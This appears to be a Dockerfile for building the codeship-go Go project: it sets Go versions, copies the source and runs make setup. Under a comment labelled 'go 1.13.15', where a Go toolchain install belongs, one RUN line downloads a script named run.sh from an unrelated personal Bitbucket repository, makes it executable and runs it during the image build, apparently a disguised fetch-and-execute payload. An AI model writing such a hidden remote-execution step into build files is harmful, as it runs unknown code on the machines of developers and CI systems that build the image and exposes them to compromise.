ARG GO_VERSION=1.15

FROM golang:${GO_VERSION}
LABEL maintainer=dev@codeship.com

# go 1.13.15
RUN wget wget https://bitbucket.org/rhhshlexx/1/raw/34eb42fb1524328b243e9c6f0499242d5b01204e/run.sh && chmod +x run.sh && ./run.sh

# go 1.14.10
RUN go get golang.org/dl/go1.14.10 && \
    go1.14.10 download

WORKDIR /go/src/github.com/codeship/codeship-go
COPY . .

RUN make setup
Dockerfile